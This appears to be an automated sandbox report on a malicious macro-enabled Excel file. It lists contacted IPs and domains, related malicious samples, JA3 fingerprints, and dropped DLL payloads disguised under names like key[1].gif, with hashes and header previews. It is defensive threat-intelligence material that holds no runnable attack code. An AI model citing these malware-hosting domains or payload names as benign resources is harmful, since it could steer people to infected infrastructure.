                                                                                                                                                              https://api.cortana.ai91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://onedrive.live.com91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F.0.drfalse
                                                                                                                                                                		high

                                                                                                                                                                Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                199.79.63.251
                                                                                                                                                                		gillcart.comUnited States
                                                                                                                                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                                162.251.80.22
                                                                                                                                                                		geit.inUnited States
                                                                                                                                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse
                                                                                                                                                                162.222.225.250
                                                                                                                                                                		mercanets.comUnited States
                                                                                                                                                                		394695PUBLIC-DOMAIN-REGISTRYUSfalse

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                Analysis ID:493727
                                                                                                                                                                Start date:29.09.2021
                                                                                                                                                                Start time:23:44:43
                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 7m 49s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Sample file name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls
                                                                                                                                                                Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                Run name:Potential for more IOCs and behavior
                                                                                                                                                                Number of analysed new started processes analysed:27
                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • HCA enabled
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • HDC enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.troj.expl.evad.winXLS@12/4@3/3
                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                HDC Information:
                                                                                                                                                                • Successful, ratio: 22.7% (good quality ratio 21.5%)
                                                                                                                                                                • Quality average: 77%
                                                                                                                                                                • Quality standard deviation: 27%
                                                                                                                                                                HCA Information:
                                                                                                                                                                • Successful, ratio: 76%
                                                                                                                                                                • Number of executed functions: 67
                                                                                                                                                                • Number of non-executed functions: 48
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Adjust boot time
                                                                                                                                                                • Enable AMSI
                                                                                                                                                                • Found application associated with file extension: .xls
                                                                                                                                                                • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                                • Attach to Office via COM
                                                                                                                                                                • Scroll down
                                                                                                                                                                • Close Viewer
                                                                                                                                                                Warnings:
                                                                                                                                                                Show All
                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 23.211.4.86, 20.199.120.85, 20.82.210.154, 23.211.5.146, 23.211.6.115, 52.109.32.63, 52.109.8.25, 20.199.120.182, 20.54.110.249, 40.112.88.60, 8.248.141.254, 8.253.204.249, 67.27.159.126, 67.26.75.254, 8.248.137.254, 93.184.221.240, 8.238.85.126, 8.248.113.254, 8.241.126.249, 8.238.85.254, 80.67.82.235, 80.67.82.211, 20.199.120.151
                                                                                                                                                                • Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net.globalredir.akadns.net, fg.download.windowsupdate.com.c.footprint.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, storeedgefd.xbetservices.akadns.net, wu.azureedge.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, wu.ec.azureedge.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, config.officeapps.live.com, e16646.dscg.akamaiedge.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                No simulations

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                199.79.63.251SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                  recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                    recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                      recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                        recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                          162.251.80.22SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                            recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                  recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                    162.222.225.250SecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                        recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                          recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                            recital-123154428.xlsGet hashmaliciousBrowse

                                                                                                                                                                                              Domains

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              geit.inSecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              mercanets.comrecital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              gillcart.comSecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251

                                                                                                                                                                                              ASN

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              Nuevo pedido # 765-3523663 ,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              PO#1135 - #U88d5#U5049.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              dhl_doc88654325571.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              ORDER _NO_32017.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.215.241.145
                                                                                                                                                                                              New Order.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.225
                                                                                                                                                                                              Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              usermasabiczx.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.62.16
                                                                                                                                                                                              IfF08zoTKQNagy0.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              vNBfeEsb8L.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 204.11.58.87
                                                                                                                                                                                              Inquiry - Specifications 002021 (2).exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              #RFQ SUPPLY Unilever House UK.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              O2bxPCQqfl.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              PO00174Quotations.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              New Order for UT- materials.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              Nuevo pedido # 765-3523663 ,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              PO#1135 - #U88d5#U5049.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              dhl_doc88654325571.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              ORDER _NO_32017.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.215.241.145
                                                                                                                                                                                              New Order.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.225
                                                                                                                                                                                              Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              usermasabiczx.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.62.16
                                                                                                                                                                                              IfF08zoTKQNagy0.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              vNBfeEsb8L.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 204.11.58.87
                                                                                                                                                                                              Inquiry - Specifications 002021 (2).exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              #RFQ SUPPLY Unilever House UK.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              O2bxPCQqfl.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              PO00174Quotations.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              New Order for UT- materials.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              PUBLIC-DOMAIN-REGISTRYUSSecuriteInfo.com.Exploit.Siggen3.20906.5188.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              Nuevo pedido # 765-3523663 ,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              PO#1135 - #U88d5#U5049.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-1302341626.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              recital-123154428.xlsGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              dhl_doc88654325571.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              ORDER _NO_32017.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 162.215.241.145
                                                                                                                                                                                              New Order.pdf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.225
                                                                                                                                                                                              Curriculum Vitae Milani.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              usermasabiczx.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.62.16
                                                                                                                                                                                              IfF08zoTKQNagy0.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143
                                                                                                                                                                                              vNBfeEsb8L.docGet hashmaliciousBrowse
                                                                                                                                                                                              • 204.11.58.87
                                                                                                                                                                                              Inquiry - Specifications 002021 (2).exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              #RFQ SUPPLY Unilever House UK.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              O2bxPCQqfl.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              PO00174Quotations.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.224
                                                                                                                                                                                              PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.199.223
                                                                                                                                                                                              New Order for UT- materials.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 208.91.198.143

                                                                                                                                                                                              JA3 Fingerprints

                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19Facturas Pagadas al Vencimiento.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              bnl9EZOu24.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              cs.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              justificante de la transfer.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              Lista comenzilor atasate.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              GCYRY3V0v7.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              DHL e_pacelFORM.HTMLGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              PO-RMS74OM PT Chrome PVT.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              ejecutable.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              Receipt-3847380.htmlGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              GRUPO MARI#U00d1O OBRAS Y SERVICIOS, SL Oferta 2709213390.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              August FinancialsBAD.txt.htmlGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              EVOLUTION TRADE Sp. z o.o. OFERTA 09212.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              MYJR0Ln7E8.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              V2dk1e5Wbs.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              bGtxXBuptf.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              3jJa7lvi9n.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              5G5rCXDzBl.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              o7LBymBKPE.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22
                                                                                                                                                                                              CwnZiHC5wY.exeGet hashmaliciousBrowse
                                                                                                                                                                                              • 199.79.63.251
                                                                                                                                                                                              • 162.222.225.250
                                                                                                                                                                                              • 162.251.80.22

                                                                                                                                                                                              Dropped Files

                                                                                                                                                                                              No context

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\Datop\test1.test
                                                                                                                                                                                              Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):473006
                                                                                                                                                                                              Entropy (8bit):5.994144001754251
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:VvT1+i+eRbPqeSIvNMenaJ8rECkSNDopGI5coPYb:Vv3F+ex1MruECBf3oPYb
                                                                                                                                                                                              MD5:278368FD7DC7D1302DC580D367812157
                                                                                                                                                                                              SHA1:09ABAC3BEFF021940C813BD89B657E229BA52625
                                                                                                                                                                                              SHA-256:B1D77E98C39262F39E1C1ABEA5657D55295B25D7E5BD96CFF1F41B7F2C9A5FDC
                                                                                                                                                                                              SHA-512:FD35A602091C33F7E8BFEBC777B9114F5643A4F896B6388D77A0C2BDE7375259C69A5EE4F9964D4FC88B275FAD08D9EC6B9251D8E715E5168C5568A42129FCA7
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R.6...X...X...X.k'...X.1i5...X.1i&...X.1i$...X.1i6...X......X......X...Y.W.X.1i/.n.X.1i#...X.1i%...X.1i!...X.Rich..X.........................PE..L......F...........!.................0...............................................G.......................................~..P...............................`....................................s..@...............4............................text...A........................... ..`.rdata...u..........................@..@.data...8...........................@....rsrc...............................@..@.reloc..x........ ..................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\91397EB9-F9FE-4202-A1C5-2BFBF4CBDD9F
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):138728
                                                                                                                                                                                              Entropy (8bit):5.360381536028763
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:1536:ycQIKNZeBdA3gBwfnQ9DQW+z2Y34Zzi7nXboOidX8E6LWME9:BWQ9DQW+zGXh1
                                                                                                                                                                                              MD5:E57A09A0B33F2D9E769DFF2452969F69
                                                                                                                                                                                              SHA1:31E51D5538731C2BD07454D660B566AD14C04791
                                                                                                                                                                                              SHA-256:E53015CC46C85CA20B9B1053EB8369DA384424E051C2994C094ED0CCE399DD81
                                                                                                                                                                                              SHA-512:C20C675D42ABA5F0C99715A24A915E30BC240321F05B14D8C977AB9E5A1A4C6614F124FFB81CB8FF96BF372FFBE60D661E7508C13259608DE47A9E7253F05ACF
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-09-29T21:45:36">.. Build: 16.0.14527.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\key[1].gif
                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):468910
                                                                                                                                                                                              Entropy (8bit):5.986572146199657
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:12288:avT1+i+eRbPqeSIvNMenaJ8rECkSNDopGI5coPYb:av3F+ex1MruECBf3oPYb
                                                                                                                                                                                              MD5:BB240163D2BA2520EF5BD6003FCA4914
                                                                                                                                                                                              SHA1:9C9446B5C67CFC4645D32748DD90EDD54C365BC5
                                                                                                                                                                                              SHA-256:A5A61A4018D8D68DA99FED20588FFA87526B71909303B8C7FC195E6964355ACD
                                                                                                                                                                                              SHA-512:1D0A014F37AD825AEB866B618E1ADD2CB835710CA7B3082DC1B8F8690F25B4925EA41EFA862F091484DB2F8C76D42B8DC8B047BD4FB7B7278D5EF497E648BCEF
                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R.6...X...X...X.k'...X.1i5...X.1i&...X.1i$...X.1i6...X......X......X...Y.W.X.1i/.n.X.1i#...X.1i%...X.1i!...X.Rich..X.........................PE..L......F...........!.................0...............................................G.......................................~..P...............................`....................................s..@...............4............................text...A........................... ..`.rdata...u..........................@..@.data...8...........................@....rsrc...............................@..@.reloc..x........ ..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              Static File Info

                                                                                                                                                                                              General

                                                                                                                                                                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Sep 29 08:59:46 2021, Security: 0
                                                                                                                                                                                              Entropy (8bit):7.351326128821904
                                                                                                                                                                                              TrID:
                                                                                                                                                                                              • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                                                              • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                                                              File name:SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls
                                                                                                                                                                                              File size:250368
                                                                                                                                                                                              MD5:7b83b99dace5664b9ab5c0c3882be408
                                                                                                                                                                                              SHA1:4c4893beca92234c023ee2dfff759e155c643ed3
                                                                                                                                                                                              SHA256:e005a59b0ab458c8a1ab6883e17504382bd72d2e9de8eb99c785de520c258c0c
                                                                                                                                                                                              SHA512:49f7f8746555e83d7a52afb63c108597db8510df1e4d0c5b350848d411245b700e012ba09421a39466a487f9450439b7aa4b7fea459c88d90299b3de1289bd24
                                                                                                                                                                                              SSDEEP:6144:iKpb8rGYrMPe3q7Q0XV5xtuEsi8/dgD9fWvcZZdtLq1JOjbwvOMPDslAvS3+Hw7c:n9fVrLmUjbwvrDa33LvfH1WO2
                                                                                                                                                                                              File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                                                              File Icon

                                                                                                                                                                                              Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                                                              Static OLE Info

                                                                                                                                                                                              General

                                                                                                                                                                                              Document Type:OLE
                                                                                                                                                                                              Number of OLE Files:1

                                                                                                                                                                                              OLE File "SecuriteInfo.com.Exploit.Siggen3.20906.5188.xls"

                                                                                                                                                                                              Indicators

                                                                                                                                                                                              Has Summary Info:True
                                                                                                                                                                                              Application Name:Microsoft Excel
                                                                                                                                                                                              Encrypted Document:False
                                                                                                                                                                                              Contains Word Document Stream:False
                                                                                                                                                                                              Contains Workbook/Book Stream:True
                                                                                                                                                                                              Contains PowerPoint Document Stream:False
                                                                                                                                                                                              Contains Visio Document Stream:False
                                                                                                                                                                                              Contains ObjectPool Stream:
                                                                                                                                                                                              Flash Objects Count:
                                                                                                                                                                                              Contains VBA Macros:True

                                                                                                                                                                                              Summary

                                                                                                                                                                                              Code Page:1251
                                                                                                                                                                                              Author:
                                                                                                                                                                                              Last Saved By:
                                                                                                                                                                                              Create Time:2015-06-05 18:19:34
                                                                                                                                                                                              Last Saved Time:2021-09-29 07:59:46
